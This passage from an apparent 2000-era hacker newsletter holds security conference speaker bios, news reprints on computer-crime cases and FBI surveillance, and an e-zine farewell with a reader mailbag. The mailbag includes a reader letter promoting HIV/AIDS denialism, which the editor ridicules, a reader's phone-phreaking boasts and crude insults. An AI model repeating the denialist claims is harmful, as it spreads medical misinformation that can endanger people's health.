      vulnerabilities from a number of different       perspectives.  Working 
      with vendors, he has identified and helped fix over two dozen major 
      security vulnerabilities. Jeremy is currently a developer at one of the 
      largest security vendors, where part of his duties include the 
      identification and reporting of security risks.  Jeremy is also one of the 
      founders of Security Focus, Inc. a centralized online security resource 
      offering security news, products, events, books, tools, and one of the 
      most comprehensive vulnerability listing on the net. 

      Dave has been working with network and Unix security for a number of years 
      and is a founding member of       Security-Focus.com.  He has dealt with 
      both general Unix auditing and intrusion detection as well as secure 
      software development.  Dave is the co-host of Info.Sec.Radio, a radio show 
      airing twice a month on both a Canadian
      radio station and the Internet via a RealAudio stream.  
      
      Their Presentation!(PowerPoint 208k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Marcus Ranum - CEO Network Flight Recorder. 
      Intrusion Detection and Network Forensics. 
      
      Marcus Ranum is CEO of Network Flight Recorder, Inc., and has been 
      specializing in Internet security since he built the first commercial 
      firewall product in 1989. He has acted as chief architect and implementor 
      of several other notable security systems including the TIS firewall tool 
      kit, TIS Gauntlet firewall, whitehouse.gov, and the Network Flight 
      Recorder. Marcus frequently lectures on Internet security issues, and is 
      co-author of the "Web Site Security Source book" with Avi Rubin and Dan 
      Geer, published by John Wiley and sons. 

      Their Presentation! (PowerPoint 199k) (Long Version -PowerPoint 460k)       
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      JD Glaser - CEO of NT Objectives. Auditing NT -  

      This talk will be the third in a series to address the issue of auditing 
      an NT box after a break in. Specifically, we will extend our look under 
      the hood to find places where altered files can hide as well as examine 
      the evidence left behind by an intruder. This talk will also cover a set 
      of tools that can uncover various hidden aspects of NT's Internal state. 
      NT's built in tools are not sufficient in most cases for examining system 
      state, so this talk include a small tutorial on a suite of free tools I 
      have made        to aid Windows NT intrusion research. Details will 
      include: 
      
      Examine NTFS file time stamping 
      Examine NT Drivers behavior 
      Examining permissions/file attributes 
      Examining COM security backdoors Part III 
      Looking for trojan behavior Part III 
      Finding for backdoors in Windows NT
      
      JD Glaser is CEO of NT OBJECTives, Inc., a maker of security audit tools 
      for Windows NT. Most notably, NTLast and Forensic Toolkit, which are free
      tools for the security community. He is an MCSE/MCSD that specializes in 
      contract DCOM programming and NT network security. Clients have included,
      Intel, HP, Columbia Sportsware and Tripwire. Latest projects have involved
      NTFS file system code for Tripwire for NT and file system filters for 
      real-time detection systems for NT that bypass NT's untrusted API. 
      Their Presentation! (PowerPoint 101k) (Greg Hoglund - Caught! 175k .jpg) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Jennifer Granick - Attorney at Law. 
      International Legal issues surrounding computer hacking. 
      
      A global computer network poses special questions in computer crime 
      prevention and punishment.  There is no international consensus on what a 
      computer crime is or what should be prohibited conduct.  Nor are there 
      agreements on procedural matters such as transborder searches, data 
      preservation, standard of proof or jurisdiction.  This presentation will 
      review the points of contention, discuss current efforts towards obtaining 
      consensus and highlight the benefits and detriments of international 
      consensus to investigators and civil libertarians alike. 

      Jennifer Stisa Granick is a defense lawyer practicing in the areas of high 
      tech and computer crime from her office in San Francisco.  She defends 
      unauthorized access, trade secret theft, and email interception cases 
      nationally.  Granick has written articles on wiretapping, workplace 
      privacy and trademark law for Wired.  Additionally, she has spoken at 
      previous Black Hat Briefings and to NASA computer security professionals 
      about computer crime laws, digital forensics and evidence collection. 

      Their Presentation! (PowerPoint 53k) (Field Notes 38k .rtf) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Martin Khoo - Assistant Director, Incident Handling, SingCERT 
      Responding to Cyber Threats. 
      
      IT and the Internet are fast becoming important parts of our national 
      competitiveness. With the emerging globalization and worldwide 
      connectivity, Internet security threats in other parts of the world can 
      quickly translate into security issues that are potentially damaging to 
      the local IT community. It is crucial for Singapore to be able to respond 
      efficiently and effectively to Internet computer incidents and security 
      breaches. It is important to have a localized CERT effort that offers 
      security incident resolution services in a timely and effective manner.  

      This talk will introduce the Singapore Computer Emergency Response Team 
      (SingCERT) and cover the various programmes and initiatives that SingCERT 
      offers to its constituency. It will also touch on the experience and 
      lessons learnt through the handling and resolution of security incidents 
      and highlight some of the trends in incidents reported to SingCERT.  

      Martin is an Assistant Director with the Infocomm Development Authority 
      (IDA) of Singapore. He takes charge of security incident management where 
      he oversees a group of IT Security Consultants in providing security 
      services to the various government organizations. He is also the Programme 
      Manager of the Singapore Computer Emergency Response Team (SingCERT) which 
      is the national level security incident response center charged with the 
      prevention, detection and resolution of computer security incident on the 
      Internet and Singapore ONE. He manages a group of Security Consultants 
      providing incident resolution and security awareness promotion services to 
      the local IT industry and the general IT users. Martin is a frequent 
      speaker on subjects regarding security and incident handling. He last 
      spoke at the PKI Conference on "Instilling Trust for Secure eCommerce" 
      organized by CommerceNet Singapore in October 1999. 
      
      Their Presentation! (PowerPoint 107k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Pierre Noel - CEO of ICSA.net Asia Pacific 
      Internet Age: Why Security Architectures Fail (The Story of the Maginot Line Under Attack) 
      
      Why are so many companies, organizations and agencies regularly hacked? 
      Some of these regularly hacked organizations have however invested huge 
      amounts in crafting their IT architectures.  Security products, both 
      hardware and software, are available off-the-shelf. Some of them underwent 
      strong security certifications, and they are widely used in the Internet, 
      even by the companies mentioned above. 

      So, what's wrong with the strategy? 

      In a 1998 survey on the 'barriers and inhibitors to eCommerce,' four out 
      of the five most important inhibitors were security-related; the same 
      survey in '99 showed these security-related inhibitors pushed back to rank 
      20 to 50! Does this mean that security is no longer an inhibitor to 
      eCommerce? Or does this imply something else? 

      Prior to the second World War, the French Army erected the Maginot Line to 
      protected themselves against invasion. Pride of the nation, the Maginot 
      line proved to be totally useless, and the invasion of France took place 
      at a very rapid pace. Can we possibly transpose this story to the IT 
      world? 

      With a series of 'field' observations, Pierre will discuss the reasons for 
      security weaknesses, and derive simple paths to reducing these exposures. 

      Pierre Noel is currently the CEO of ICSA.net Asia Pacific and the 
      president and founder of Burton & Brooks International, a consulting firm 
      specialized in IT security for large enterprises and governments. As 
      president of Burton & Brooks, Pierre is charged with the role of chief 
      technical officer for the Hong Kong Post Public Key Infrastructure and 
      Root Certification Authority project. 

      Previously, Pierre was first the director of security best practice, Asia 
      for PLATINUM technology, before he was promoted to vice president for 
      Security Consulting Worldwide after Computer Associates' acquisition of 
      PLATINUM.  Pierre has more than 10 years of experience in providing 
      independent consultancy worldwide. He specialized in the fields of 
      Enterprise Security and large scale mission critical OLTP systems. Pierre 
      was chief consultant and architect at the Open Software Foundation, then 
      known as The Open Group. 
      
      Their Presentation! (PowerPoint 1,118k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
       
      Wilfred Adrian Nathan - Head, Computer Forensics Branch, CID Singapore. 
      Computer Crime: The law enforcement perspective with case studies. 
        
      
      Their Presentation! (PowerPoint 497k) 
      See It! (surestream video file) 
      Hear it! Real Audio (28k-isdn surestream)
       
      
      --------------------------------------------------------------------------------
      
      @HWA


289.0 [IND] FBI Investigating Qualcomm Hacker
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.infowar.com/hacker/00/hack_070800a_j.shtml
      
      7/05/00
      FBI Investigating Qualcomm Hacker
      By Staff, Newsbytes
      WASHINGTON, D.C., U.S.A.,
      07 Jul 2000, 2:53 PM CST
      
      The FBI is investigating a University of Wisconsin student as a possible 
      suspect in a series of hacker attacks against wireless provider Qualcomm, 
      according to a San Diego Union-Tribune story today.

      The FBI has accused a University of Wisconsin graduate student of hacking 
      into San Diego-based Qualcomm's computer networks, replacing files and 
      installing "back doors, which allowed him to re-enter the system from a 
      number of points on the network, the story reports.

      According to documents filed in San Diego federal court, the intrusions 
      pierced Qualcomm's firewalls and network security, and jeopardized a 
      number of the company's crucial servers that contain proprietary 
      information.

      The story also reports that investigators learned the student broke into 
      computer networks operated by three other companies, including NetOptions, 
      a Los Angeles-based Internet service provider; CISNet of Youngstown, Ohio; 
      and the TeX Users Group, an organization based in Massachusetts for those 
      interested in text typesetting and font design.

      The FBI declined to comment on the case, and Qualcomm officials did not 
      return calls seeking comment. 
      
      @HWA

290.0 [IND] Lloyd's Offers Hacker Insurance
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.infowar.com/hacker/00/hack_071000a_j.shtml      
      
      7/10/00
      Lloyd's Offers Hacker Insurance
      By The Associated Press
      Special to CNET News.com
      July 9, 2000, 11:30 p.m. PT
      
      http://news.cnet.com/news/0-1005-200-2232221.html 
      
      Lloyd's offers hacker insurance 
      By The Associated Press
      Special to CNET News.com
      July 9, 2000, 11:30 p.m. PT 
      Lloyd's of London will offer up to $100 million in insurance coverage to 
      clients of computer-security management firm Counterpane Internet Security 
      against hacker-related losses to its business or its customers. 

      San Jose, Calif.-based Counterpane in its announcement today claimed to be 
      the first Internet-security service provider to offer a guarantee of 
      direct financial reimbursement in the event a hacker breaks through its 
      defenses and uses customer data. The guarantee is underwritten by 
      insurance brokers Frank Crystal & Co. and SafeOnline, with additional 
      coverage available for purchase from Lloyd's. 

       
      "This is not for your home user; this is for Yahoo, this is for CD 
      Universe, which lost all those credit card numbers (to a hacker) in 
      January," said Bruce Schneier, chief technology officer at Counterpane. 
      "It's threat avoidance. This, along with monitoring, is just another arrow 
      in your quiver." 

      Standard computer security includes firewalls, antivirus software that is 
      updated weekly, and systems that can prevent the entry of hackers. But 
      experts say much of that software contains weaknesses that can be 
      exploited by enterprising hackers. 

      An FBI-funded report in March suggested an epidemic of computer crime is 
      under way across the United States, based on 643 responses, mainly from 
      large companies and government agencies. Since March 1999, nine out of 10 
      organizations reported computer security breaches, according to the annual 
      Internet crime survey by the FBI and the San Francisco-based Computer 
      Security Institute. 

      The most common forms of unauthorized computer intrusions are viruses, 
      stolen laptop computers and employees abusing their Internet privileges. 
      But businesses increasingly are reporting more serious incidents, 
      including system penetration from the outside, financial fraud, data 
      network sabotage or denial-of-service attacks--a deluge of repetitive 
      requests sent to clog a Web site's computers until they seize up. 

      Various organizations have estimated that hacker attacks this year have 
      cost businesses tens of billions of dollars, mostly in lost time. A study 
      released last week by Jericho, N.Y.-based Reality Research estimated 
      businesses worldwide will lose more than $1.5 trillion this year because 
      of computer viruses spread through the Internet. 

      The "I Love You" virus, spread  via email earlier this year, affected 
      about 45 million computer files at a cost to companies of $2.61 billion 
      alone, according to Computer Economics. 

      Counterpane's Schneier said a $20,000 annual premium will provide coverage 
      for $1 million in hacker losses; the cost rises to $75,000 for $10 million 
      in losses. The price of any additional coverage, up to $100 million, must 
      be negotiated with Lloyd's. 

      Some regular insurance policies pay hacker losses under loss-of-business 
      or act-of-vandalism clauses, but there are few policies written to 
      specifically cover hacker attacks. And those that do often carry premiums 
      that start at $100,000 and run up to $3 million. 

      Analysts say the hacker insurance market is expected to grow to billions 
      of dollars in annual premiums by the end of the decade, reflecting the 
      growing popularity of e-commerce. But insurers have been reluctant to be 
      the groundbreakers because there are no effective tools for measuring the 
      risk. 

      Insuretrust.com also assesses security risks but provides protection only 
      for what it calls "residual risks." 

      IBM and insurance broker Sedgwick Group provide products ranging from 
      security reviews to compensation for lawsuits brought by victims of online 
      credit card fraud. And International Computer Security Association, an 
      Internet security company, announced in 1998 that it will pay corporations 
      up to $250,000 if hackers successfully crack its computer system. 

      Copyright  2000 Associated Press. All rights reserved. This material may 
      not be published, broadcast, rewritten, or redistributed. 
      
      
      
      @HWA
      
291.0 [MM] Man charged with breaking into NASA computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      July 12 2000
      
      Source: MSNBC
      Submitted by: Spikeman
      
      http://www.msnbc.com/news/432167.asp?0nm=O11R

      Man charged with breaking into NASA computers

      WHITE PLAINS, N.Y., July 12  Federal authorities
      today arrested an alleged hacker who they say
      broke into NASA computers in 1998 and used one
      to host a chat room for other hackers.
      
      Mary Jo White, the U.S. attorney for the
      Southern District of New York, indicted Raymond Torricelli, 20, aka rolex,
      on five felony counts for credit card fraud, interception and unauthorized
      access to two National Aeronautics and Space Administration computers. 
      
       White alleged in court documents that Torricelli broke
      into two computers at the agencys Jet Propulsion Laboratory (JPL). 

        Prosecutors allege the hackers, part of a group called #conflict, chatted
      about hacking, cracking, credit card fraud and how to use their computers to
      alter the results of the annual MTV Movie Awards, White said in a statement. 
                                
      CODES DECRYPTED Torricelli allegedly used the other JPL computer to place a 
      sniffer program to intercept computer user names and passwords on networks. 
      
      Prosecutors said they discovered 76,000 such passwords on Torricellis home 
      computer many of which had been decrypted. 
                                
      Torricelli allegedly also cracked 800 other computers in his online sneaking
      spree. 

      Conviction on the credit card fraud and password possession charges could 
      lead to 10 years in jail and a $250,000 fine. The password interception charge
      carries a possible five-year term and $250,000 fine, and the two charges for 
      computer intrusion are punishable by a year in jail  for each count. 
                                
      WENT HOME TO MOM 
    
      Torricellis court-appointed attorney, Suzanne Brody of Federal Legal Aid,
      said she had not yet had a chance to discuss the case in depth with her client. 
      She said his computers were seized two years ago following the alleged activity,
      but Torricelli was not arrested then.       
     
             Before being released on $50,000 bond today, Torricelli was understandably
      frightened by the experience of being arrested by federal authorities, Brody said. 
              
              We got him bailed out, and he went home to his mother,  Brody said.  
      Torricelli is from New Rochelle. Last December, another New Rochelle teenager was
      sentenced for hacking America Onlines computer system after gaining knowledge of
      the Internet service provider working as a technical support volunteer for the 
      company.
                                
      @HWA  

292.0 [MM] The FBI's Carnivore(s) Initiative (More big brother)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      MSNBC
      http://www.msnbc.com/news/432143.asp  
      Forget the FBIs snooping What about your boss?
      By Lisa Napoli
       MSNBC


  
               
      July 12    Lots of people have their knickers in a
      knot over this unfortunately named surveillance
      program the FBI is using called  Carnivore. 
      (Sounds like a sequel to Survivor, but in actuality,
      its a sniffer that tracks the e-mail of criminal
      suspects.) The notion of the FBI forcing an
      Internet Service Provider to check out the e-mail
      of some bad guy isnt such a terrible idea, on the
      face of it, though it certainly isnt as sexy as a
      high-speed chase or something out of Shaft.
      Remember, folks, though its easy to forget: Law
      enforcement is actually good for society, and
      technology can aid and abet in the quest for law
      and order.
      
      BUT ITS THE opportunity for screw-ups, and abuse,
      that has the American Civil Liberties Union, among others,
      concerned. Marc Rotenberg of the Electronic Privacy
      Information Center summed it up nicely:  It goes to the heart
      of how the Fourth Amendment and the federal wiretap
      statute are going to be applied in the Internet age. 
             Of course, there is the possibility that the FBI would
      inadvertently read your mail in addition to that of the
      suspects, and not only violate your privacy, but perhaps get
      you into trouble as well. (Two-for-one?) For that very reason,
      the infamous and ground-breaking Dutch ISP, XS4ALL,
      refused to comply with its governmental authorities three
      years ago when they asked to tap into one of their customers.
      Since then, the Dutch government has passed a shiny new
      telecommunications law that would give them the power to
      conduct such a digital wiretap. 
             Here in the United States, we have the Electronic
      Communication Privacy Act, a 1986 law that is being
      interpreted by the government as allowing digital wiretaps
      using software like Carnivore.
             And while all that is interesting, what everyone seems to
      be forgetting is that your boss is more likely to be reading
      your e-mail than the FBI. 

             This study from the latest American Management Association 
      Monitoring  and Surveillance study. Nearly three quarters of major
      US firms record and review
      employee communications and activities on the job, including
      their phone calls, e-mail, Internet connections, and computer
      files,  the group reports. Thats twice what the AMA found
      in 1997, when the survey was first conducted. 
             One of the most infamous users of blocking software in
      the workplace is Bloomberg, the financial news service.
      Starting in June 1999, Bloomberg started scanning outgoing
      e-mail on the service for words that the company considered
      racist, profane, or offensive. When the policy was first
      instituted, cheeky employees kept testing the waters to see
      which words would make it through.
             But just because your workplace mail isnt scanned
      doesnt mean someone isnt watching. Stories about software
      that monitors your surfing activity   to see if youre wasting
      time on the clock   are common. And keep in mind: Your
      superiors may start watching you if they suspect a problem.
      Case in point: The New York Times Co. says it doesnt
      routinely scan e-mail, unless there have been complaints. And
      last year, complaints about racy e-mails circulating led to the
      firing of 23 people at an administrative facility in Virginia. 
             The potentially thorny privacy issues raised by Carnivore
      are an issue, to be sure but what you say and how you surf
      at work might get you into more trouble, more immediately.
      Have you had an experience where your e-mail activity at
      work has been monitored? Id love to hear from you.
                                 
      @HWA                                       
      

293.0 [IND] Forbidden Knowledge calls it quits.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.mdma.za.net/fk
      http://www.mdma.za.net/fk-farewell.txt
      
      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      (          F  0  R  B  1  D  D  3  N      K  N  0  W  L  3  D  G  3          )
      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      (              T  h  e    F  i  n  a  l    C  h  a  p  t  e  r               )
      +--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==--++--==+
      
      Soundtrack for this Notice: REM - At my most beautiful
      
      The Forbidden Knowledge project, born just over a year and a half ago, has
      drawn to a close. Not because there were any fall-outs among us, or because
      I've lost interest, but simply because better opportunities have come
      along.
      
      Basically, Kokey was pondering reviving his e-zine, but was uncertain of his
      time constraints. I on the other hand was busy with mine, but not getting
      enough support. Our respective problems had a natural solution and that was
      working on a new zine together. (And besides, I can't risk the chance of Kokey
      releasing an e-zine that 0wnz mine unless I'm working on it too. ;P)
      
      So, yes, in some ways FK is dead, and in others, it lives on. I will still be
      working on something and releasing my warped texts on a quasi-regular basis,
      and they will still have that Wizdumb-esque insanity that makes them virtually
      unreadable. But FK as you know it is a thing of the past. And it will be
      sorely missed by me especially.
      
      Special thanks to everyone who has helped out with the zine in any way, wether
      it be feedback or article submissions, or whatever - I love you all. And for
      the record, here are all the people who submitted to FK, in chronological
      order...
      
      Wizdumb
      Pneuma
      Gevil
      Opium
      Brainsaw
      Cyberphreak
      Moe1
      Hitsquad
      Vortexia
      Flashfire
      supo
      Nakamura
      Terabyte
      jus
      Cyberware
      CoLdBLood
      DrSmoke
      Sigma
      MercEnarY
      Virulent
      Jumpers
      DvD
      JungleG
      
      And there you have it ladies and gentlemen. The credits have rolled, the
      lights have come back on, and the few who are still in the room are on their
      way out.
      
      But hey - it's not too long before the first issue of the new, as yet to be
      named zine - which will totally 0wn FK anyway. So be sure to stay tuned to
      http://scene.textfiles.com watching out for it. :)
      
      Sorry that there are no articles in the final installment of FK, they've all
      been hijacked for the new zine. But I feel bad using nothing of the old FK12.
      Hmmm... Okay... Just to have something, I'll tack the mailbag from FK12 onto
      the end of this.
      
      Once again, Thanks for supporting FK
      Wizdumb <wizdumb@leet.org>
      
      -----------------------[ Lame-ass mailbag concatenated for nostalgia's sake
      
      From: 777 <rwx@el8.org>
      To: wizdumb@leet.org
      Date: Wed, 17 May 2000 19:04:38 -0700
      Subject: Congratulations
      
      Congratulations for your excellent article about Chaos Magick in FK #11!
      
      --
      Hail Eris!! All hail Discordia!
      
      [Wizdumb: We're glad you appreciated it - It's quite interesting how many
       chaote hackers there are around. Perhaps it has something to do with a lack
       of respect for rules and boundaries, or an urge to learn without being
       restricted. Or maybe hackers are just smart. :P Thanks for writing.]
      
      -----*****-----******-----
      
      [Wizdumb: Caution, Long Obnoxious Letter follows. Read on at your own risk.]
      
      From: "Drew Hendricks" <drewhendricks@hotmail.com> 
      To: wizdumb@leet.org 
      Date: Thu, 18 May 2000 12:38:02 CDT 
      Subject: http://www.virusmyth.com/aids/index.htm 
      
      RE: Thabo Mbeki's public statement (and letter to Bill Clinton) saying
      that it can't be proved that HIV leads to AIDS - especially
      considering how much goddamn medical experience he has. And lets not
      even *begin* to consider the amount of damage a statement like that
      can cause when almost a *third* of the world is HIV positive. Thabo
      Mbeki, I sincerely hope that you get AIDS and die. I am actually
      *ashamed* to have such a fucking idiot as a president.
      
      OK, two things first:
      
      The man who announced that the virus he later named HIV causes AIDS was
      booted out of the American scientific community when it became obvious
      that he is a lying sack of shit who would sell you a cure for the
      common cold if he could convince you it was eating your momma's face.
      His name is Dr Robert Gallo - you should look him up.
      
      The man who invented the Polymerase Chain Reaction and won the Nobel
      Prize for doing so has personally told me that he has searched in vain
      for ANY paper which even claims to prove HIV causes AIDS and HE CANT
      FIND ONE.  His name is Dr Kerry Mullis.  For a Dr, he's a pretty neat
      surfer dude. Look him up, too.
      
      [Wizdumb: Right, I've been reading for two paragraphs and I haven't learnt
       anything - something tells me this is going to be one of *those* letters.]
      
      Additional, if you have not already flamed me out of sheer ignorance:
      
      [Wizdumb: No, wait, I've learnt that this man is a pompous butthead. That's
       something I suppose.]
      
      Just because AIDS is real - and believe me, it is - does not mean that
      the "conventional" wisdom about its origins is true.
      MANY people have tested negative for HIV and died of AIDS.  MANY people
      have tested positive for HIV and never been sick.  Just look at the
      case of a certain famous American basketball star, who has been positive
      for most of a decade...and has yet to be sick.
      
      [ Exiting due to signal SIGSTUPID
        Excessive Stupidity Fault at eip=64756D62 ]
      
      Shit, man - read for yourself and make an informed decision:
      
      http://www.virusmyth.com/aids/index.htm
      
      [Wizdumb: Well, I really hate to have to be the one to tell you this, but I
       guess some-one has to break it to you: The web is the biggest, most
       widely-accessible source of *bullshit* information on this planet - I
       wouldn't touch it with a ten-foot barge-pole, let alone believe anything I
       read on it.]
      
      Better yet, apply a little logic:
      
      The US Military announces in 1970 that it wants "...a synthetic biological
      agent...that does not naturally exist, and for which no natural immunity
      could have been aquired."   "Most important(ly) ... is that it might
      be refractory to the immunological and therapeutic processes upon which we
      depend to maintain our relative freedom from infectious diseases."
      (91st Congress, Appropriations hearings for Dept Defense, 1970 Dr MacArthur)
      >>>He guesses that within 5 to 10 years such an agent would be possible<<<
      >>>That puts it right about 1980....<<<
      
      Next, the "gay plague" occurs in New York and other large American cities
      among sexually active young men, who suddenly have a host of infections
      more common to organ transplant patients whose immune systems have been
      artificially suspended.
      
      Within a few years, a PRESS CONFERENCE announces a new study by Dr Gallo
      which WILL PROVE (when it is published) that a new retro-virus is the
      cause of GRIDS (Gay-Related Immune Defficiency Syndrome).
      
      [Wizdumb: Aaah. I see it now. Let's have promiscous sex with lots of women
       and shoot all those goddamn disgusting fags. That sounds like a plan.]
      
      The paper is never published in a peer reviewed paper.  A version is
      finally released, but it does not come close to proving the simple
      HIV virus could cause ANY immune supression, much less the complete
      collapse of the system...it relies instead on a tiny sample of donors
      who have a high co-relation (Many have HIV particles in their blood,
      and also have AIDS.)  No one from a control group is even tested for
      the virus, since the antibody test is not yet perfected and the other
      tests are so expensive.
      
      METAPHOR:
      
      [Wizdumb: Oh dear.]
      
      SO - the military announces it will have a supersonic aircraft:
      The citizens of a town near an airbase hear sonic booms -
      CONCLUSION:  the Air Force probably has supersonic aircraft!
      
      APPLICATION OF METAPHOR:
      
      So- the military announces that it wants an immunity-killer:
      people start dying of AIDS -
      CONCLUSION: maybe they were serious, maybe they did come up with
      something!
      
      [Wizdumb: OMG! That was amazing! Thankyou for your wonderful metaphor to
       explain this to me - I wouldn't have known wtf you were on about otherwise!]
      
      But how do they hide it?
      Any doctor not on their payroll is capable of publishing a report
      of the real pathogen and showing that is is obviously an artificial
      organism with big, fat splices in its DNA...
      
      But let me ask you - who is looking for the cure to poliio today?
      
      NO ONE.
      
      [Wizdumb: *GASP* No? ]
      
      After all, we know what casues polio.  There's a vaccine.
      
      [Wizdumb: *Phew* ]
      
      Who would look for the cause of a disease which is already found?
      
      WHERE IS THE HIV VACCINE?
      
      [Wizdumb: *GASP* You HAVE to stop scaring me like this! ]
      
      20 years later, still no vaccine.  Lots of evidence that anti-AIDS
      chemotherapy was deadly during the 1980's and 1990's, but NO VACCINE!
      
      Something does not add up, my friend...your president might not be so
      fucking stupid after all; you did say he has medical experience, right?
      
      [Wizdumb: No, I was employing a device known as sarcasm. You should try to
       start picking it up better if you want to try communicate with your species
       some time.]
      
      HOW MANY HOSPITALS HAVE YOU WORKED IN?
      
      [Wizdumb: None, obviously enough. But my idiocy is only inflicted on a small
       group of depraved hax0rs who never get laid anyway and thus don't need to
       worry. If I were president, I could do a significantly greater amount of
       damage with my opinions. And anyway, is my 0 years experience any less
       relevant than Thabo Mbeki's 0 years experience? No. I didn't think so.]
      
      (And where in the hell did you get the "1/3 of Earth has HIV" shit?
      If anything is proof of what Mbeki says, that would be it...think
      about it!  We would all be dying or know someone personally who is...)
      
      Drew
      
      [Wizdumb: My figures were obviously exaggerated. However, I *DO* personally
       know somebody with AIDS and *two* with HIV. Maybe you don't know anyone with
       AIDS because your only friend is your mom and you spend all your time sending
       long obnoxious e-mails to people who really couldn't care less what the fuck
       you think?]
      
      -----*****-----******-----
      
      From: "David Knapp" <dknapp@calpoly.edu> 
      To: <wizdumb@leet.org> 
      Date: Tue, 16 May 2000 14:06:56 -0700 
      Subject: e-zine question 
      
      Sorry for being a dumb 'merican - but I have a question about the BMW
      unlocking procedure. What is the "boot" on a BMW? I am unfamiliar with
      that term.
      
      ta
      dbk
      
      [Wizdumb: LOL, I wasn't actually aware that this was a South-African-ism.
       Sorry - it's the "trunk" :) Hmmm... I think I could have quite a lot of fun
       if I developed a huge vocabluary of South-African-specific slang, and then
       wrote an article on explosives. :P ]
      
      -----*****-----******-----
      
      From: Frits Haas <Frits.a1@mweb.co.za> 
      To: wizdumb@leet.org 
      Date: Thu, 18 May 2000 05:00:24 -0700 
      Subject: re : fk11 / C/Khaos magick 
      
      greetz ...Rabbit here...
      
      i was quite interested in what u guys had on Chaos magick...although very
      simplified indeed i've been studying Magick for about 6 years now...more Wicca
      than anything else...
      
      [Wizdumb: Captain, my tree-hugging hippy radar is going wild :)]
      
      ....and if u would like me to contribute anything...gimme a shout (but do not
      ..*repeat* do not inform Vortexia...he'll
      
      1) blow a vein in his head
      2) swear for 1/2 an hour without repeating a word
      3) vow to kill me
      4) vow to hax0r me (*try* to anyway - lets not go there)
      5) etc etc ...i'm sure u know the story by now...
      
      [Wizdumb: Not really, but, HEY VORT, Did you hear what this guy said about
       your mom?!! Are you gonna let him get away with that?!@#$%^]
      
      although i do not practise Chaos..(i think it's very dangerous)..i know quite
      alot about it and of ppl that have burnt their hands on it...(it's more
      dangerous than u think...)
      
      [Wizdumb: So I've heard. Personally, I keep my Chaos in the fridge, and then
       only warm it up marginally in the microwave. I've always been one to play
       it safe when it comes to this crazy supernatural stuff. :P]
      
      Wicca on the other hand is (in some ways) similar ..and (in other ways)
      opposite
      
      [Wizdumb: Aaah.]
      
      my personal book of shadows contains about 2900 pages...and i have not yet
      begun to collect other BOS...this is just my own dealings...
      
      [Wizdumb: *My* Book of Shadows is 0 pages, I have not yet begun to collect
       my work - this is only what my cat has done.]
      
      anyway...
      
      kewl zine dude...keep up the l33t work
      
      [Wizdumb: Glad ya like it. Keep reading, when the new zine comes out, bro. :)]
      
      regards,
      Rabbit
      aka Frits
      
      bright blessings and merry part
      
      -----*****-----******-----
      
      From: "k-rad-bob" <k-rad-bob@b0g.org>
      To: <wizdumb@leet.org>
      Subject: h0h0!
      Date: Sun, 21 May 2000 23:45:47 +0200
      
      reading fk11 almost made me ejaculate in my pants (i read it at work of
      course) and i simply had to email you guys.
      
      [Wizdumb: Are you implying that you don't wear pants when not at work?]
      
      b0g loves you!!!!!
      
      [Wizdumb: We love b0g!!!! :)]
      
      since you guys are so lovable i'll add fk to the zines section (when im
      bothered that is, im pretty lazy/buzy these days) til then, have fun and
      strangle a Turk!
      
      oh, and by the way: FUCK OFF!#@!
      
      yours in cyberspace
      
      k-rad-bob
      
      [Wizdumb: Fuq j0o!@#$ We officialy return j0r wage of war, and are giving full
       priority to the destruction of b0g. Not only will we 0wn b0g.org, but we will
       0wn b0g.org. Furthermore, we will 0wn b0g.org. We have also started a b0g
       mirror at www.mdma.za.net/b0g solely to deface it at a later date - 0h0h0h0]
      
      -----*****-----******-----
      
      Date: Tue, 23 May 2000 16:06:14 -0700 (PDT)
      From: Richie Hasting <naz-t1@excite.com>
      To: wizdumb@leet.org
      Subject: greets Wyzewun fellow telkom h8terz
      X-Mailer: Excite Inbox
      X-Sender-Ip: 196.22.171.126
      
      Hiya greets form a phreaker,hacker in ZA your info is hardcored but I have
      even more 2 add like how 2 remoteley controll a ISP's pop servers power
      remoteley as well as how to phreak fone linez of people living in flats, and
      how 2 cover ones tracks. I ALSO HAVE KNOWLEDGE IN THE CELLULAR INDUSTRY
      USING SOCIAL ENGENEERING SKILLZ TO GET WHAT I want.
      
      [Wizdumb: OMG! This is my favourite type of e-mail! The type where you just
       sit and wonder what the FUCK the dildo on the other side is trying to get
       across to you. Sometimes, late at night, you can read over them and they
       almost make sense - granted that you've had a good few shots of vodka prior
       to reading that is. Regardless, these rock - send more please.]
      
      I am currently in the process of cloning telephone cards but only one
      problem I NEED @ OBTAIN A TELKOM GREEN PHONE card machine as i NEED THE
      READER, have u any ideas 2 break the green bastard open and get the insides
      (die binne goed) out....
      
      [Wizdumb: Okay, I have now established that the writer is Afrikaans, so should
       I forgive him for not being able to speak English? Hmmm... Naah, if his
       English sucks this much then he should've written to me in Afrikaans for
       crying out loud.]
      
      Pls email me to get more info outa me, if u don't email me I'll think I am
      not 3l33t3 enuff.
      
      [Wizdumb: Guess yer not "3l33t3" enuff, eh?]
      
      Regards 
      Naz-t1 also known as naz-1
      
      eail me...
      
      Cheerz
      
      [Wizdumb: *Sigh* I hate this job... When is that transfer coming through?]
      
      
      
      NO CARRIER
      
      @HWA
      
      As a sort of homage, here is issue #11, the final release of FK for the
      archives. - Ed
      
      ===---===---===---===---===---===---===---===---===---===---===---===---===---

